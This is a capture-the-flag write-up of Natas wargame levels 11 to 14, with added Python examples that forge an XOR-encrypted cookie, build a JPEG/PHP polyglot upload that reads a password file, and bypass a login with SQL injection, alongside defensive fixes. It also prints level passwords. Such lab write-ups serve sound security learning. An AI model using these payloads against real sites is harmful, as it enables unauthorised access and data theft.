Natas Level 11
This level opens up with a simple background color changing application.
We have access to the source code again, so upon reading it we see that default data is loaded using a loadData function.
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
$data = loadData($defaultdata);
The loadData function starts from the default data and checks whether the cookie has a key "data".
If it does, it base64-decodes the cookie value, runs it through the custom xor function, json-decodes the result and stores that in the $tempdata variable. It then checks that $tempdata is an array with both a "showpassword" and a "bgcolor" key, and that bgcolor matches the format of a hex colour code (#123456). Only if all of that holds does it copy the two values from $tempdata into $mydata, which it returns.
For the returned $mydata to be something we control, a few things must all be true:
- The cookie has the "data" key in it
- The three-step decode of the cookie "data" value (base64_decode, then the xor function, then json_decode) must yield an array
- The array must have both a showpassword and a bgcolor key
- The bgcolor value must match the format of a hex colour code
So we need to craft a cookie that, once it comes out of the three-step decode, results in an array with the key "showpassword" set to "yes" and a bgcolor key set to some valid hex code.
Luckily for us, json_decode and base64_decode have their inverses built into PHP (json_encode and base64_encode), so those two steps are easy to reverse. The xor step needs a closer look: to reverse it we need its key.
XOR is associative and commutative, and every value is its own inverse (A xor A = 0). This means that if:
A xor B = C, then
A xor C = B, and
B xor C = A, and so on.
In this case, we have a key, an input text and an output text. Applying the same principle, we can recover the key the xor function uses and then produce whatever output we want:
IN xor KEY = OUTPUT, so
IN xor OUTPUT = KEY
We know both sides: the input is the base64-decoded cookie, and the output is the json-encoded default array, {"showpassword":"no","bgcolor":"#ffffff"}, since that is what the server encrypted to produce our cookie in the first place. To get the cookie, open the dev tools, enter document.cookie in the console and copy the data value.
Cookie = MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY
XORing the base64-decoded cookie with that JSON string returns:
KNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLKNHLK
The xor function cycles through its key when the text is longer than the key, which is why the output repeats: the key is 'KNHL'. Now we want an array with showpassword set to yes and a valid bgcolor hex code. Applying the same principle in the other direction:
JSON xor KEY = COOKIE (before base64 encoding)
In other words, we reverse what the server does to the cookie: json-encode our array, xor it with KNHL and base64-encode the result. That gives the cookie value we need:
MGw7JCQ5OC04PT8jOSpqdmk3LT9pYmouLC0nICQ8anZpbS4qLSguKmkz
We can set it from the dev tools console by typing
document.cookie="data=thecookieyougot"
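The whole procedure in Python, as an added example that is not part of the original write-up: recover the keystream from the pasted cookie and the known default JSON, find its period, forge the new cookie, and run it through a re-implementation of the loadData checks described above to confirm it would be accepted. The cookie string comes from the page; the xor helper, the loadData re-implementation and all function names are mine. The pasted cookie lacks its base64 '=' padding, so the decode helper re-pads it. The known-plaintext trick only recovers as many key bytes as there is known plaintext; here the four-byte period shows up well within the 41 bytes.

```python
import base64
import json
import re
from itertools import cycle

# Cookie value copied from the page (document.cookie); pasted without base64 '=' padding.
ORIGINAL_COOKIE = "MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY"
# The array the server json-encodes and encrypts: $defaultdata from the level source.
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}
WANTED_DATA = {"showpassword": "yes", "bgcolor": "#ffffff"}


def php_json_encode(obj: dict) -> str:
    """Mimic PHP json_encode() defaults: no whitespace, '/' escaped as '\\/'."""
    return json.dumps(obj, separators=(",", ":")).replace("/", "\\/")


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Same operation as the level's custom xor function: the key repeats when shorter."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def b64decode_unpadded(s: str) -> bytes:
    """base64-decode a value whose '=' padding may have been dropped when copied."""
    return base64.b64decode(s + "=" * (-len(s) % 4))


def recover_keystream(cookie: str, known_plaintext: str) -> bytes:
    """IN xor OUTPUT = KEY: ciphertext xor known plaintext yields the repeating key."""
    return xor_with_key(b64decode_unpadded(cookie), known_plaintext.encode())


def shortest_period(stream: bytes) -> bytes:
    """Shortest unit that, repeated, reproduces the stream: b'KNHLKNHL...K' -> b'KNHL'."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def forge_cookie(key: bytes, data: dict) -> str:
    """Run the server's decode path backwards: json_encode -> xor -> base64."""
    return base64.b64encode(xor_with_key(php_json_encode(data).encode(), key)).decode()


def server_load_data(cookie: str, key: bytes, default: dict = DEFAULT_DATA) -> dict:
    """Re-implementation (mine) of the loadData() checks described above: both keys
    must exist and bgcolor must look like #rrggbb, else the defaults are returned."""
    mydata = dict(default)
    try:
        tempdata = json.loads(xor_with_key(b64decode_unpadded(cookie), key))
    except ValueError:  # bad base64, non-UTF-8 bytes or invalid JSON
        return mydata
    if isinstance(tempdata, dict) and "showpassword" in tempdata and "bgcolor" in tempdata:
        if re.fullmatch(r"#[0-9a-f]{6}", str(tempdata["bgcolor"]), re.IGNORECASE):
            mydata["showpassword"] = tempdata["showpassword"]
            mydata["bgcolor"] = tempdata["bgcolor"]
    return mydata


if __name__ == "__main__":
    keystream = recover_keystream(ORIGINAL_COOKIE, php_json_encode(DEFAULT_DATA))
    key = shortest_period(keystream)
    forged = forge_cookie(key, WANTED_DATA)
    print("keystream:  ", keystream.decode())
    print("key:        ", key.decode())
    print("cookie:     ", forged)
    print("server sees:", server_load_data(forged, key))
```

The design point worth taking away: a repeating-key XOR with a fixed server-side key is not encryption in any useful sense once one plaintext/ciphertext pair is known, and nothing here authenticates the cookie, so any structure that passes the shape checks is accepted.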
Upon refreshing the page with our new cookie:
Pass for next level: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG
Natas Level 12
We are presented with a simple page to choose and upload a file. Reading the source code, we see that it lets us upload a jpeg file to the site and then does a couple of things to it.
The important thing to note is that once the file is stored, the site generates a link to it and displays that link on the page. So if we upload PHP code disguised as a jpeg and get the server to store it under a .php name, following the link will make the server execute our code.
First, we create a fake jpg that will echo the password for the next level, as we have done in previous levels, by reading it out of the webpass folder.
The result is a .jpg file that actually contains PHP code reading the password file.
Uploading this to the website gives a clickable link that doesn't do much: the server serves the file as an image, so the PHP inside it is never executed.
To make the link do something, we change the extension of the stored file to .php so that the server runs our code instead of serving it as an image. The upload form carries the destination filename in a hidden field, so we edit its extension in the dev tools before submitting; the resulting link prints out the password stored for the next level.
Pass for next level: lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9
Natas Level 13
Now the site checks whether the uploaded file is actually an image, using the exif_imagetype function. According to the documentation, this function reads the first bytes of a file and compares them against known image signatures; a return value of 2 means IMAGETYPE_JPEG. So we just need to prepend the JPEG signature bytes to our file to get past the check. I did this using hexedit, but any tool that edits the bytes of a file will work here.
After a quick search I found that I needed to set the first 4 bytes to
FF D8 FF DB, the bytes that start a raw JPEG file. (exif_imagetype only needs the three-byte SOI signature FF D8 FF; DB is the marker that follows it in a raw JPEG.)
I added 4 placeholder characters to the start of my image file so I could overwrite them using hexedit.
I uploaded the image, changed its extension as before and received the password for the next level!
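The level 12 and level 13 payload in one place, as an added example that is not from the write-up: it builds the JPEG/PHP polyglot, checks it against a magic-byte sniff that behaves like exif_imagetype(), and shows what a stricter server-side upload check would and would not catch. The sniff function, accept_upload and the function names are mine; the /etc/natas_webpass path in the payload is the conventional Natas location and is an assumption, not something the page states.

```python
# Added example: build the JPEG/PHP polyglot used in levels 12 and 13 and check it
# against a magic-byte sniff that behaves like PHP's exif_imagetype().

JPEG_SOI = b"\xff\xd8\xff"   # exif_imagetype() recognises JPEG from these three bytes alone
IMAGETYPE_JPEG = 2           # the return value the write-up mentions

# Payload described in the write-up: PHP that reads the next level's password file.
# The path is the conventional Natas location; it is an assumption, not taken from the page.
PHP_PAYLOAD = b'<?php echo file_get_contents("/etc/natas_webpass/natas14"); ?>'

# A few of the signatures exif_imagetype() knows, mapped to their IMAGETYPE_* numbers.
SIGNATURES = {
    b"GIF8": 1,                 # IMAGETYPE_GIF
    JPEG_SOI: IMAGETYPE_JPEG,
    b"\x89PNG\r\n\x1a\n": 3,    # IMAGETYPE_PNG
}


def image_type(data: bytes):
    """Stand-in for exif_imagetype(): the IMAGETYPE_* number, or None where PHP returns false."""
    for sig, kind in SIGNATURES.items():
        if data.startswith(sig):
            return kind
    return None


def make_polyglot(php: bytes, next_marker: bytes = b"\xdb") -> bytes:
    """Prepend FF D8 FF plus the marker byte that follows in a raw JPEG (DB, as in the write-up).

    PHP emits the four leading bytes as literal output and then executes the <?php ... ?> block,
    so the response is four junk bytes followed by the password."""
    return JPEG_SOI + next_marker + php


def accept_upload(filename: str, data: bytes) -> bool:
    """Server-side check that closes the level-12 hole: the extension is validated against an
    allowlist instead of being taken from the client, and the bytes must sniff as an image.
    A polyglot stored as .jpg still gets through, which is why the upload directory should
    also not execute scripts (or the image should be re-encoded before storage)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in {"jpg", "jpeg", "png", "gif"} and image_type(data) is not None


if __name__ == "__main__":
    polyglot = make_polyglot(PHP_PAYLOAD)
    print("first bytes: ", polyglot[:4].hex(" ").upper())
    print("sniffed type:", image_type(polyglot))
    with open("payload.jpg", "wb") as fh:   # upload this, then rename the target to .php
        fh.write(polyglot)
```

Running it writes payload.jpg next to the script; the accept_upload check is there to make the caveat concrete: magic bytes prove only that the first bytes look like an image, so the real defence is never letting the client pick the stored extension and never executing anything from the upload directory.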
Pass for next level: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP
Natas Level 14
We open up to a login screen. The source code makes it apparent that there is a MySQL database behind it.
The query that is called looks like this:
SELECT * from users where username="input" and password="input";
The code then checks whether the query returned any rows. A simple SQL injection guarantees that a row is always returned:
SELECT * from users where username="" or ""="" and password="" or ""="";
This works because ""="" is always true, so the WHERE clause holds for every row (AND binds tighter than OR, but the trailing or ""="" still makes the whole condition true). Since the query already wraps our input in double quotes, we enter " or ""=" in both fields to produce the query above.
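The injection against a small in-memory database, as an added example that is not from the write-up, with the parameterised version beside it. The users table and its rows are constructed for this example. The page's payload is " or ""=" against MySQL, which treats "..." as a string literal; SQLite reads "..." as an identifier first, so the executable part of the example uses single quotes with exactly the same shape, while render_query reproduces the double-quoted query the level's server would see.

```python
import sqlite3

# Constructed sample table; the users and passwords are made up for this example.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]

# The page's payload is  " or ""=" . MySQL treats "..." as a string literal, so the level's
# double-quoted query is injectable as written. SQLite reads "..." as an identifier first,
# so the executable part of this example uses single quotes; the shape is identical.
PAYLOAD = "' or ''='"


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con


def render_query(username: str, password: str, quote: str = '"') -> str:
    """The query string the level builds: input spliced straight into quoted literals."""
    return (f"SELECT * from users where username={quote}{username}{quote} "
            f"and password={quote}{password}{quote}")


def vulnerable_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Mirrors the level: run the concatenated query and accept if any row comes back.
    With the payload the WHERE clause becomes
        username='' or ''='' and password='' or ''=''
    AND binds tighter than OR, but the trailing  or ''=''  makes it true for every row."""
    rows = con.execute(render_query(username, password, quote="'")).fetchall()
    return len(rows) > 0


def safe_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the values travel separately from the SQL, so quotes inside
    them stay data and the payload simply matches no user."""
    rows = con.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?", (username, password)
    ).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    con = build_db()
    print(render_query('" or ""="', '" or ""="'))                 # what the level's server runs
    print("vulnerable:", vulnerable_login(con, PAYLOAD, PAYLOAD))  # True: every row matches
    print("safe:      ", safe_login(con, PAYLOAD, PAYLOAD))        # False
```

The fix is the same in any language and driver: never build the WHERE clause by string concatenation; bind the values as parameters so the database engine never parses user input as SQL.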
Upon clicking login, we are through to the next level.
Pass for next level: TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB
What I learnt
It was really fun getting to do some of the SQL injections, as I've always heard about them but never had the chance to do one. I learnt how some verification methods work, like exif_imagetype checking the bytes of a file. I also learnt that, since code runs on websites, the languages used on the web, like JavaScript, PHP and Java, can all be exploited.